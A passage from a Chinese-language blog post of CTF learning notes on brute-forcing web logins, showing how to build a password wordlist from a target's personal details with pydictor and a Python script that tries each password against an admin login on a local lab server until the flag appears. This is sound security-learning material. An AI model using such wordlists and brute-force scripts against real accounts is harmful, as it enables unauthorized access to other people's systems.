<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/8.png" class="" title="图片正常显示了喵~">

<p>是社会工程学哎~</p>
<p><strong>社会工程学</strong>：<u>利用个人的信息来推测他们的密码</u>(＃°Д°)（想起来前几天被朋友“盒”了，畏惧了老大Orz</p>
<p>那么，天空一声巨响，pydictor闪亮登场~</p>
<p><strong>步骤：</strong></p>
<p>我们应该还是要根据它提供的信息，使用pydictor生成一个密码字典，再用python进行爆破</p>
<p>1）打开我们的kali，进入pydictor</p>
<p>我们输入<code>python3 pydictor --sedb</code>（这里的sedb是指社会工程数据库：Social Engineering Database），查看<code>help desc</code>，使用<code>set</code>把对应的信息填进去生成我们需要的密码字典，（记得要输入exit退出pydictor喵~）再使用<code>sz</code>下载</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/9.png" class="" title="图片正常显示了喵~">

<p>2）下一步嘛…自然是抓包转成.py并修改来进行爆破啦~（跟上面的第二道题是一样的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">session = requests.session()</span><br><span class="line"></span><br><span class="line">burp0_url = <span class="string">&quot;http://192.168.154.128:32840/login.php&quot;</span></span><br><span class="line">burp0_headers = &#123;<span class="string">&quot;Cache-Control&quot;</span>: <span class="string">&quot;max-age=0&quot;</span>, <span class="string">&quot;Accept-Language&quot;</span>: <span class="string">&quot;zh-CN,zh;q=0.9&quot;</span>, <span class="string">&quot;Origin&quot;</span>: <span class="string">&quot;http://192.168.154.128:32840&quot;</span>, <span class="string">&quot;Content-Type&quot;</span>: <span class="string">&quot;application/x-www-form-urlencoded&quot;</span>, <span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>: <span class="string">&quot;1&quot;</span>, <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36&quot;</span>, <span class="string">&quot;Accept&quot;</span>: <span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7&quot;</span>, <span class="string">&quot;Referer&quot;</span>: <span class="string">&quot;http://192.168.154.128:32840/&quot;</span>, <span class="string">&quot;Accept-Encoding&quot;</span>: <span class="string">&quot;gzip, deflate, br&quot;</span>, <span class="string">&quot;Connection&quot;</span>: <span class="string">&quot;keep-alive&quot;</span>&#125;</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;sedb_155912.txt&#x27;</span>,<span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> file:</span><br><span class="line">        line = line.strip()</span><br><span class="line">        <span class="built_in">print</span>(line)</span><br><span class="line">        burp0_data = &#123;<span class="string">&quot;username&quot;</span>: <span class="string">&quot;admin&quot;</span>, <span class="string">&quot;password&quot;</span>: line&#125;</span><br><span class="line">        response = session.post(burp0_url, headers=burp0_headers, data=burp0_data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;用户名或密码错误！&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            <span class="built_in">print</span>(response.text)</span><br><span class="line">            <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>运行，于是心爱的flag就出现啦~</p>
<img src="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/10.png" class="" title="图片正常显示了喵~">

<h3 id="Gloria思考了一下，爆破不一定是简单的对密码进行爆破，还有可能连账户名都不知道需要一起爆破，那么如何高效的爆破，这一部分回头会补上去的喵"><a href="#Gloria思考了一下，爆破不一定是简单的对密码进行爆破，还有可能连账户名都不知道需要一起爆破，那么如何高效的爆破，这一部分回头会补上去的喵" class="headerlink" title="Gloria思考了一下，爆破不一定是简单的对密码进行爆破，还有可能连账户名都不知道需要一起爆破，那么如何高效的爆破，这一部分回头会补上去的喵~"></a>Gloria思考了一下，爆破不一定是简单的对密码进行爆破，还有可能连账户名都不知道需要一起爆破，那么如何高效的爆破，这一部分回头会补上去的喵~</h3>
    </div>
    <footer class="article-footer">
        <a data-aos="zoom-in" href="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/#comments" class="article-comment-link">
          <span class="post-comments-count valine-comment-count" data-xid="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/" itemprop="commentCount"></span>
          Comments
        </a>
        <span data-aos="zoom-in" id="/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/" class="leancloud_visitors article-visitor-link" data-flag-title="web学习笔记之暴力破解喵">
          <span class="leancloud-visitors-count">0</span>
          <em class="post-meta-item-text">Readings</em>
        </span>
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag" title="Web安全">Web安全</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/" rel="tag" title="暴力破解">暴力破解</a></li></ul>

    </footer>
  </div>
    <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
      <div class="article-nav-link-wrap left">
          <img data-src="/images/4.jpg" data-sizes="auto" alt="web学习笔记之命令执行喵" class="lazyload">
        <a href="/2025/11/16/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%96%B5/" aria-label="Prev: web学习笔记之命令执行喵" title="Prev: web学习笔记之命令执行喵"></a>
        <div class="article-nav-caption">Prev</div>
        <h3 class="article-nav-title">
            web学习笔记之命令执行喵
        </h3>
      </div>
    <div class="article-nav-link-wrap right">
        <img data-src="/images/1.png" data-sizes="auto" alt="web学习笔记之反序列化喵" class="lazyload">
      <a href="/2025/11/11/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%96%B5/" aria-label="Next: web学习笔记之反序列化喵"  title="Next: web学习笔记之反序列化喵"></a>
      <div class="article-nav-caption">Next</div>
      <h3 class="article-nav-title">
          web学习笔记之反序列化喵
      </h3>
    </div>
  </nav>

</article>

  <section id="comments" data-aos="fade-up">
    <div class="comment-header">
        
      <h2 class="comment-title">Leave a comment</h2>
      <div class="comment-selector">
        <div class="comment-selector-wrap">
            <div class="selector-item" data-selector="valine">
              <span>valine</span>
            </div>
        </div>
      </div>
    </div>
    <div class="comment-content">
        <div class="comment valine-comment" data-aos="fade-up"
          id="valine-comment">
        </div>
    </div>
  </section>

</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    <div>
      <span class="icon-copyright"></span>
        2020-2025
      <span class="footer-info-sep rotate"></span>
      Gloria
    </div>
      <div>
        Powered by&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
      <div>
        <span class="icon-brush"></span>
        20.9k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        01:32
      </div>
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
  </div>
</footer>

          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
        <div class="sidebar-toc-sidebar"><h3 class="toc-title">Contents</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8A%E5%A4%A9%E6%9D%A5%E5%AD%A6%E4%B9%A0%E4%B8%80%E4%B8%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5"><span class="toc-number">1.</span> <span class="toc-text">今天来学习一下暴力破解喵~</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bp%E5%A4%AA%E6%85%A2%E4%BA%86%E6%80%8E%E4%B9%88%E5%8A%9E%EF%BC%9F%E5%A4%9A%E5%8D%8A%E6%98%AF%E5%BA%9F%E4%BA%86-%E6%9D%A5%E4%B8%80%E6%B3%A2%E6%9B%B2%E7%BA%BF%E6%95%91%E5%9B%BD%E5%8F%AD"><span class="toc-number">1.1.</span> <span class="toc-text">bp太慢了怎么办？多半是废了  来一波曲线救国叭~</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%9C%A8bp%E4%B8%AD%E5%AE%89%E8%A3%85copy-as-Python-requests%E6%8F%92%E4%BB%B6%EF%BC%8C%E6%88%91%E4%BB%AC%E5%B0%B1%E5%8F%AF%E4%BB%A5%E5%88%A9%E7%94%A8python%E4%BB%A3%E7%A0%81%E6%9D%A5%E8%BF%9B%E8%A1%8C%E7%88%86%E7%A0%B4%E5%95%A6"><span class="toc-number">1.1.1.</span> <span class="toc-text">在bp中安装copy as Python-requests插件，我们就可以利用python代码来进行爆破啦</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pudictor%E6%98%AF%E4%BB%80%E4%B9%88%E5%96%B5%EF%BC%9F%E5%BF%AB%E6%9D%A5%E5%AD%A6%E5%96%B5-%E2%9D%81%C2%B4%E2%97%A1-%E2%9D%81"><span class="toc-number">1.1.2.</span> <span class="toc-text">pudictor是什么喵？快来学喵(❁´◡&#96;❁)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%92%A6%EF%BC%9F%E5%A5%BD%E5%83%8F%E6%98%AF%E8%BF%9B%E9%98%B6%E7%89%88%E7%9A%84pydictor%EF%BC%9F%E5%BF%AB%E6%9D%A5%E7%9C%8B%E7%9C%8B%E5%8F%AD"><span class="toc-number">1.1.3.</span> <span class="toc-text">咦？好像是进阶版的pydictor？快来看看叭</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Gloria%E6%80%9D%E8%80%83%E4%BA%86%E4%B8%80%E4%B8%8B%EF%BC%8C%E7%88%86%E7%A0%B4%E4%B8%8D%E4%B8%80%E5%AE%9A%E6%98%AF%E7%AE%80%E5%8D%95%E7%9A%84%E5%AF%B9%E5%AF%86%E7%A0%81%E8%BF%9B%E8%A1%8C%E7%88%86%E7%A0%B4%EF%BC%8C%E8%BF%98%E6%9C%89%E5%8F%AF%E8%83%BD%E8%BF%9E%E8%B4%A6%E6%88%B7%E5%90%8D%E9%83%BD%E4%B8%8D%E7%9F%A5%E9%81%93%E9%9C%80%E8%A6%81%E4%B8%80%E8%B5%B7%E7%88%86%E7%A0%B4%EF%BC%8C%E9%82%A3%E4%B9%88%E5%A6%82%E4%BD%95%E9%AB%98%E6%95%88%E7%9A%84%E7%88%86%E7%A0%B4%EF%BC%8C%E8%BF%99%E4%B8%80%E9%83%A8%E5%88%86%E5%9B%9E%E5%A4%B4%E4%BC%9A%E8%A1%A5%E4%B8%8A%E5%8E%BB%E7%9A%84%E5%96%B5"><span class="toc-number">1.2.</span> <span class="toc-text">Gloria思考了一下，爆破不一定是简单的对密码进行爆破，还有可能连账户名都不知道需要一起爆破，那么如何高效的爆破，这一部分回头会补上去的喵~</span></a></li></ol></li></ol>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Gloria" class="lazyload">
  <div class="sidebar-author-name">Gloria</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Post</div>
    <div class="sidebar-state-number">9</div>
  </div>
  <div class="sidebar-state-category">
    <div>Category</div>
    <div class="sidebar-state-number">3</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tag</div>
    <div class="sidebar-state-number">7</div>
  </div>
</div>
<div class="sidebar-social">
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-icon icon rotate">
            &#xe62b;
        </div>
        <div class="sidebar-menu-link">Home</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-icon icon rotate">
            &#xe62b;
        </div>
        <div class="sidebar-menu-link">Archives</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-icon icon rotate">
            &#xe62b;
        </div>
        <div class="sidebar-menu-link">About</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
        <div class="sidebar-menu-icon icon rotate">
            &#xe62b;
        </div>
        <div class="sidebar-menu-link">Friend</div>
      </div>
</div>
</div>
  </div>
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
</nav>

    </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>




<script src="/js/script.js"></script>


  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>


<script src="/js/pjax_script.js" data-pjax></script>




  
<script src="https://npm.webcache.cn/mouse-firework@0.1.1/dist/index.umd.js" integrity="sha384-8LyaidD9GPxQQgLJO&#x2F;WRw&#x2F;O2h3BoNq&#x2F;ApI&#x2F;ecpvM6RsrCz2qP2ppBXUKihP4V&#x2F;2d" crossorigin="anonymous"></script>

  <script>
    if (!false || !window.matchMedia('(max-width: 768px)').matches) {
      window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'));
    }
  </script>





<div id="lazy-script">
  <div>
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "Gloria",
          title: "web学习笔记之暴力破解喵",
          url: "http://example.com/2025/11/15/web%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%96%B5/",
          excerpt: "",
          description: "",
          stripContent: "今天来学习一下暴力破解喵~bp太慢了怎么办？多半是废了  来一波曲线救国叭~在bp中安装copy as Python-requests插件，我们就可以利用python代码来进行爆破啦方法：bp中点Extensions➡BApp Store➡search查找框输入 copy as Python-requests➡install 想知道如何使用吗？话不多说，直接上栗子（题目来源于learnctf，侵权删）➡   四位数密码…bp这得爆多久哇QAQ，不如我们拿python试试呢？ 步骤： 1）先抓包➡",
          date: "Sat Nov 15 2025 16:00:00 GMT+0800",
          updated: "Thu Nov 20 2025 12:08:44 GMT+0800",
          cover: "/images/2.jpg",
        };
      </script>
        
<script src="/js/insert_highlight.js" data-pjax></script>

      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        const initPswp = (gallery, children) => {
          if (_$$(`${gallery} ${children}`).length > 0) {
            new PhotoSwipeLightbox({
              gallery,
              children,
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
        }
        const pswp = () => {
          initPswp('.article-entry', 'a.article-gallery-item');
          initPswp('.article-gallery', 'a.article-gallery-item');
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
        
<script data-pjax>
  var loadScript = (src, integrity) => {
    const script = document.createElement('script');
    script.src = src;
    if (integrity) script.integrity = integrity;
    script.crossOrigin = 'anonymous';
    return script;
  };

  var commentConfigKeys = ["valine"];
  var commentConfig = {
    valine: {
      enable: true,
      load: () => {
        const container = document.querySelector('.valine-comment');
        if (!container) return;
        if (container.style.display === 'block') return; // already loaded
        container.style.display = 'block';

        const script = loadScript(
          'https://npm.webcache.cn/valine@1.5.1/dist/Valine.min.js',
          'sha384-3ma91AExDeMAZ1rjTjaP8V2A2obQE+s5ltKRwYlwdpArz9xVbp0tF3b0VV2ACNPn'
        );
        script.onload = () => {
          var GUEST_INFO = ['nick', 'mail', 'link'];
          var guest_info = 'nick,mail,link'.split(',').filter((item) => {
            return GUEST_INFO.indexOf(item) > -1
          });
          var recordIP = JSON.parse('true');
          var highlight = JSON.parse('true');
          var visitor = JSON.parse('true');
          var serverURLs = undefined;

          if (window.Valine) {
            new Valine({
              el: '.valine-comment',
              appId: "kvVONbiLMyDuTRiZvZ1bTwdK-gzGzoHsz",
              appKey: "3n0P97K1hXTVGGSYeh03GY57",
              placeholder: "说点什么喵",
              pageSize: '10',
              avatar: 'mp',
              lang: document.documentElement.lang || 'en',
              recordIP: recordIP,
              highlight: highlight,
              visitor: visitor,
              requiredFields: guest_info,
              path: window.location.pathname,
              serverURLs
            });
          }
        };
        document.head.appendChild(script);
      }
    },
  }
  commentConfig.enable = commentConfigKeys.some(key => commentConfig[key].enable);

  var defaultComment = '';
  if (commentConfig.enable) {
    // 1. 首先检查localStorage中是否有保存的评论类型
    var savedCommentType = localStorage.getItem('commentType');
    
    // 2. 如果localStorage中有值且对应的评论系统可用，就使用它
    if (savedCommentType) {
      if (commentConfig[savedCommentType]?.enable) {
        defaultComment = savedCommentType;
      }
    }
    
    // 3. 如果localStorage无效，检查配置的默认评论系统
    if (!defaultComment) {
      var configDefault = 'waline';
      if (commentConfig[configDefault]?.enable) {
        defaultComment = configDefault;
      }
    }
    
    // 4. 如果前两项都无效，按指定顺序找到第一个可用的评论系统
    if (!defaultComment) {
      defaultComment = commentConfigKeys.find(sys => commentConfig[sys].enable) || '';
    }
  }
  function loadComments() {
    if (!commentConfig.enable) return;
    const loadedComments = {
      valine: false,
      waline: false,
      twikoo: false,
      gitalk: false,
      giscus: false
    };

    // 隐藏所有评论容器
    const hideAllComments = () => {
      const commentContainers = document.querySelectorAll('.comment');
      commentContainers.forEach(container => {
        container.style.display = 'none';
      });
    };

    // 按需加载评论系统
    const loadCommentSystem = (type) => {
      if (loadedComments[type]) {
        // 如果已加载，只需显示对应容器
        document.querySelector(`.${type}-comment`).style.display = 'block';
        return;
      }

      // 根据类型加载对应的脚本
      commentConfig[type]?.load();
      loadedComments[type] = true;
    };

    // 评论组件选择器
    const changeActiveCommentItems = (item) => {
      const commentItems = document.querySelectorAll('.selector-item');
      for (let i = 0; i < commentItems.length; i++) {
        commentItems[i].classList.remove('active');
      }
      item.classList.add('active');

      // 获取要加载的评论系统类型
      const commentType = item.getAttribute('data-selector');

      // 隐藏所有评论系统
      hideAllComments();

      // 加载选中的评论系统
      loadCommentSystem(commentType);
    };

    const commentInit = () => {
      // 评论组件选择器点击事件
      const commentItems = document.querySelectorAll('.selector-item');
      for (let item of commentItems) {
        item.addEventListener('click', () => {
          // 保存选择器状态
          const commentType = item.getAttribute('data-selector');
          window.localStorage.setItem('commentType', commentType);
          // 切换选中状态
          changeActiveCommentItems(item);
        });
      }

      // 检查是否需要加载默认评论系统
      if (defaultComment) {
        const defaultSelectorItem = document.querySelector(`[data-selector="${defaultComment}"]`);
        if (!defaultSelectorItem) return;
        defaultSelectorItem.style.display = 'block';
        defaultSelectorItem.classList.add('active');
        loadCommentSystem(defaultComment);
      }
    }

    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', commentInit);
    } else {
      commentInit();
    }
  };
  loadComments();
</script>

  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.10.4' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>


<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>





  </body>
  </html>
